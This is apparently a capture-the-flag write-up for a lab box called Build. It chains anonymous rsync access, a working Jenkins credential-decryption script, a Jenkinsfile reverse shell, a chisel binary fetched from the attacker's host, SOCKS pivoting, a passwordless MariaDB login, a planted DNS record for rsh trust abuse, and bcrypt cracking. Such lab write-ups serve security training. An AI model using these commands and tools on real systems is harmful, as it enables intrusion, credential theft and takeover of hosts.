vulnlab-build
an easy Linux box
rsync enumeration

The box runs an rsync daemon that lists its modules to anonymous clients. It exposes a single module, backups, which holds a Jenkins home backup (the jenkins_configuration directory used in the next step):

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsync -av --list-only rsync://10.10.94.243
backups         backups

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsync -r rsync://10.10.94.243::backups
Decrypting the Jenkins password

The backup contains Jenkins' key material under secrets/ (master.key and hudson.util.Secret) and a job configuration, jobs/build/config.xml, with an encrypted credential in it. master.key derives the AES key that unwraps hudson.util.Secret, and the key stored in there decrypts the {...} tokens in config.xml:

┌──(puck㉿kali)-[~/vulnlab/build/jenkins_configuration/secrets]
└─$ python3 ../../decrypt.py master.key hudson.util.Secret ../jobs/build/config.xml
Git<redacted>!

The recovered password is the one for the buildadm Gitea account.
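For readers who do not have the decrypt.py used above, the following is an added example (not the writeup's script and not Jenkins code) that implements the same unwrapping chain in Python. It needs pycryptodome for AES and falls back to the cryptography package if that is missing. The master.key text, hudson.util.Secret blob and config.xml snippet it works on are constructed inside the block (a fixed 256-byte payload and a fixed IV stand in for the random values Jenkins generates), so it runs offline; given real files it behaves like the script above: python3 jenkins_decrypt.py master.key hudson.util.Secret config.xml. It handles the braced {...} v1 token format only, not the legacy unbraced ECB format.

```python
#!/usr/bin/env python3
"""Unwrap Jenkins credentials: master.key -> hudson.util.Secret -> {...} tokens.
Added example, not the writeup's decrypt.py. Needs pycryptodome or cryptography."""
import base64, hashlib, re, struct, sys

try:  # pycryptodome
    from Crypto.Cipher import AES as _AES

    def _cipher(key, iv):
        return _AES.new(key, _AES.MODE_CBC, iv) if iv else _AES.new(key, _AES.MODE_ECB)

    def aes_encrypt(key, data, iv=None):
        return _cipher(key, iv).encrypt(data)

    def aes_decrypt(key, data, iv=None):
        return _cipher(key, iv).decrypt(data)
except ImportError:  # fall back to the 'cryptography' package
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _cipher(key, iv):
        return Cipher(algorithms.AES(key), modes.CBC(iv) if iv else modes.ECB())

    def aes_encrypt(key, data, iv=None):
        e = _cipher(key, iv).encryptor()
        return e.update(data) + e.finalize()

    def aes_decrypt(key, data, iv=None):
        d = _cipher(key, iv).decryptor()
        return d.update(data) + d.finalize()

MAGIC = b"::::MAGIC::::"  # Jenkins appends this so a wrong master key is detectable


def pkcs7_pad(data, bs=16):
    n = bs - len(data) % bs
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#7 padding (wrong key?)")
    return data[:-n]


def master_aes_key(master_key_text):
    # Util.toAes128Key: SHA-256 of the trimmed master.key text, first 16 bytes
    return hashlib.sha256(master_key_text.strip()).digest()[:16]


def confidentiality_key(master_key_text, hudson_util_secret):
    # hudson.util.Secret = AES-ECB(master key, 256 random bytes || MAGIC || padding)
    blob = pkcs7_unpad(aes_decrypt(master_aes_key(master_key_text), hudson_util_secret))
    if not blob.endswith(MAGIC):
        raise ValueError("master.key does not unlock hudson.util.Secret")
    return blob[:-len(MAGIC)][:16]  # CryptoConfidentialKey uses the first 16 payload bytes


def decrypt_secret(token, key):
    # v1 token: "{" base64( 0x01 | iv_len(4, BE) | data_len(4, BE) | iv | AES-CBC data ) "}"
    token = token.strip()
    if not (token.startswith("{") and token.endswith("}")):
        raise ValueError("only the braced v1 format is handled")
    payload = base64.b64decode(token[1:-1])
    if payload[0] != 1:
        raise ValueError("unknown payload version %d" % payload[0])
    iv_len, data_len = struct.unpack(">II", payload[1:9])
    iv = payload[9:9 + iv_len]
    data = payload[9 + iv_len:9 + iv_len + data_len]
    return pkcs7_unpad(aes_decrypt(key, data, iv)).decode("utf-8")


def tokens_in_xml(xml_text):
    # every {base64} token in a config.xml / credentials.xml
    return re.findall(r"\{[A-Za-z0-9+/=]+\}", xml_text)


def recover(master_key_text, hudson_util_secret, xml_text):
    key = confidentiality_key(master_key_text, hudson_util_secret)
    return [decrypt_secret(t, key) for t in tokens_in_xml(xml_text)]


def build_sample():
    """Constructed inputs shaped like what Jenkins writes (not the box's values)."""
    master_key_text = b"0c8d3c9a1b2e4f5d6a7b8c9d0e1f2a3b4c5d6e7f8091a2b3c4d5e6f708192a3b\n"
    payload = bytes(range(256))  # stands in for Jenkins' 256 random key bytes
    hudson_util_secret = aes_encrypt(master_aes_key(master_key_text), pkcs7_pad(payload + MAGIC))
    iv = bytes(range(16, 32))  # Jenkins picks a random IV; fixed here for reproducibility
    data = aes_encrypt(payload[:16], pkcs7_pad(b"Git-s3cret!"), iv)
    blob = b"\x01" + struct.pack(">II", len(iv), len(data)) + iv + data
    xml_text = "<password>{%s}</password>" % base64.b64encode(blob).decode()
    return master_key_text, hudson_util_secret, xml_text


if __name__ == "__main__":
    if len(sys.argv) == 4:  # python3 jenkins_decrypt.py master.key hudson.util.Secret config.xml
        raw = [open(p, "rb").read() for p in sys.argv[1:]]
        print("\n".join(recover(raw[0], raw[1], raw[2].decode("utf-8", "replace"))))
    else:
        print(recover(*build_sample()))
```

The MAGIC suffix is what makes a wrong master.key fail loudly instead of yielding garbage: decrypting hudson.util.Secret with the wrong key either breaks the padding or leaves a blob that does not end in ::::MAGIC::::, and both raise.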
Log in to Gitea as buildadm with that password and get RCE by editing the repository's Jenkinsfile so that a build step spawns a reverse shell; the next build runs it inside the Jenkins container.
Start a netcat listener to catch the shell:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.94.243] 38892
sh: 0: can't access tty; job control turned off
# pwd
/var/jenkins_home/workspace/build_dev_main
# cd /root
# ls
user.txt
# cat user.txt
VL{bf<redacted>c2}

The pipeline runs as root inside the Jenkins container (root prompt, /root readable), not on the host: the container lives on the 172.18.0.x Docker network, which is why the next step pivots through it.
Run a chisel server on Kali with reverse tunnelling enabled:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ chisel server -p 8000 --reverse
2024/08/09 10:26:20 server: Reverse tunnelling enabled
2024/08/09 10:26:20 server: Fingerprint pcPwgUx5V0JZX07cMUWbhSsjiQijd+PWFISAgaIp+vE=
2024/08/09 10:26:20 server: Listening on http://0.0.0.0:8000
2024/08/09 10:28:31 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

From the Jenkins container, fetch the chisel binary (wget is absent, curl is present) and connect back. R:socks opens a SOCKS proxy on the server side at 127.0.0.1:1080, which is what proxychains (socks5 127.0.0.1 1080 in /etc/proxychains4.conf) uses below:

# pwd
/root/.ssh
# wget http://10.8.2.138/chisel
sh: 24: wget: not found
# curl http://10.8.2.138/chisel -o chisel
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 8506k  100 8506k    0     0  8620k      0 --:--:-- --:--:-- --:--:-- 8618k
# chmod +x chisel
# ls -la
total 8528
drwxr-xr-x 3 root root    4096 Aug  9 08:25 .
drwxr-xr-x 1 root root    4096 May  9 18:50 ..
lrwxrwxrwx 1 root root       9 May  1 14:37 .bash_history -> /dev/null
-r-------- 1 root root      35 May  1 17:37 .rhosts
drwxr-xr-x 2 root root    4096 May  1 16:05 .ssh
-rwxr-xr-x 1 root root 8711104 Aug  9 08:25 chisel
-rw------- 1 root root      37 May  1 14:29 user.txt
# ./chisel client 10.8.2.138:8000 R:socks
2024/08/09 08:28:30 client: Connecting to ws://10.8.2.138:8000
2024/08/09 08:28:30 client: Connected (Latency 20.395643ms)

Two things in that listing are worth noting: .bash_history is a symlink to /dev/null, and root has a 35-byte .rhosts file. The .rhosts file is the hint that rsh host-based trust is configured on this box, which the final step relies on.
Scan the Docker host (172.18.0.1, the bridge gateway) through the proxy. Proxychains can only relay complete TCP connections, so this is a connect scan of nmap's default top 1000 ports, and the service names come from nmap's port table rather than version probing:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains -q nmap 172.18.0.1
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-09 10:29 CEST
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 24.50% done; ETC: 10:30 (0:00:46 remaining)
Stats: 0:00:36 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 62.10% done; ETC: 10:30 (0:00:23 remaining)
Nmap scan report for 172.18.0.1
Host is up (0.059s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
873/tcp  open  rsync
3000/tcp open  ppp
3306/tcp open  mysql
8081/tcp open  blackice-icecap

Nmap done: 1 IP address (1 host up) scanned in 59.51 seconds

Ports 512, 513 and 514 are the Berkeley r-services (rexec, rlogin, rsh), 53 is a DNS server, 873 is the rsync daemon from the start, and 3306 is a database reachable only from the Docker network.
Connect to MariaDB through the proxy. root logs in without a password:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ proxychains mysql -h 172.18.0.1 -u root
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.18.0.1:3306  ...  OK
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 34
Server version: 11.3.2-MariaDB-1:11.3.2+maria~ubu2204 mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| powerdnsadmin      |
| sys                |
+--------------------+
5 rows in set (0.025 sec)

MariaDB [(none)]> use powerdnsadmin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [powerdnsadmin]> select * from user;
+----+----------+-------------------------------------+-----------+----------+----------------+------------+---------+-----------+
| id | username | password                            | firstname | lastname | email          | otp_secret | role_id | confirmed |
+----+----------+-------------------------------------+-----------+----------+----------------+------------+---------+-----------+
|  1 | admin    | $2b$12$s1hK<redacted>Ze3Uw5Sc2.hsEq | admin     | admin    | admin@build.vl | NULL       |       1 |         0 |
+----+----------+-------------------------------------+-----------+----------+----------------+------------+---------+-----------+
1 row in set (0.023 sec)

MariaDB [powerdnsadmin]> select * from records;
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
| id | domain_id | name                 | type | content                                                                                  | ttl  | prio | disabled | ordername | auth |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
|  8 |         1 | db.build.vl          | A    | 172.18.0.4                                                                               |   60 |    0 |        0 | NULL      |    1 |
|  9 |         1 | gitea.build.vl       | A    | 172.18.0.2                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 10 |         1 | intern.build.vl      | A    | 172.18.0.1                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 11 |         1 | jenkins.build.vl     | A    | 172.18.0.3                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 12 |         1 | pdns-worker.build.vl | A    | 172.18.0.5                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 13 |         1 | pdns.build.vl        | A    | 172.18.0.6                                                                               |   60 |    0 |        0 | NULL      |    1 |
| 14 |         1 | build.vl             | SOA  | a.misconfigured.dns.server.invalid hostmaster.build.vl 2024050201 10800 3600 604800 3600 | 1500 |    0 |        0 | NULL      |    1 |
+----+-----------+----------------------+------+------------------------------------------------------------------------------------------+------+------+----------+-----------+------+
7 rows in set (0.022 sec)

Two things come out of this. The user table holds the PowerDNS-Admin admin's bcrypt hash (saved to admin.hash for cracking below). The records table is the live zone data for build.vl that the box's PowerDNS serves, and root can write to it, so inserting an A record makes any name under build.vl resolve to an address of our choosing. The record below points admin.build.vl at the Kali box (10.8.2.138), which is what the rsh login at the end depends on:

MariaDB [powerdnsadmin]> INSERT INTO records (id, domain_id, name, type, content, ttl, prio, disabled, ordername, auth)
    -> VALUES (7, 1, 'admin.build.vl', 'A', '10.8.2.138', 60, 0, 0, NULL, 1);
Query OK, 1 row affected (0.023 sec)

MariaDB [powerdnsadmin]>
Crack the admin hash from the user table. It is bcrypt at cost 12 (4096 iterations, so only ~41 candidates per second here), but john finds it in its wordlist pass (mode 2 of 3) against the default password.lst:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ john admin.hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Proceeding with wordlist:/usr/share/john/password.lst
wi<redacted>on       (?)
1g 0:00:00:17 DONE 2/3 (2024-08-09 10:36) 0.05688g/s 40.95p/s 40.95c/s 40.95C/s roman..xavier
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The rsh path to root below does not need this password.
Install an rsh client on the Kali box:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ sudo apt-get install rsh-redone-client

rsh to the build.vl host as root. No password is asked for because of the A record planted above: rshd's ruserok check forward-resolves the hostnames listed in root's .rhosts and accepts the connection if one of them resolves to the peer address, and the host resolves names through the PowerDNS instance whose records table was just edited. Two practical caveats: rshd only accepts connections from a reserved source port (below 1024), so the client must run with root or setuid privileges, and with no command given rsh hands over to rlogin, which is why an interactive login with the Ubuntu banner comes back:

┌──(puck㉿kali)-[~/vulnlab/build]
└─$ rsh -l root 10.10.94.243
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-105-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

  System information as of Fri Aug  9 08:42:41 AM UTC 2024

  System load:                      0.64306640625
  Usage of /:                       62.7% of 9.75GB
  Memory usage:                     60%
  Swap usage:                       0%
  Processes:                        144
  Users logged in:                  0
  IPv4 address for br-f8002c9d7234: 172.18.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for ens5:            10.10.94.243

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@build:~# pwd
/root
root@build:~# cat root.txt
VL{fe<redacted>b2}
root@build:~#
That was fun.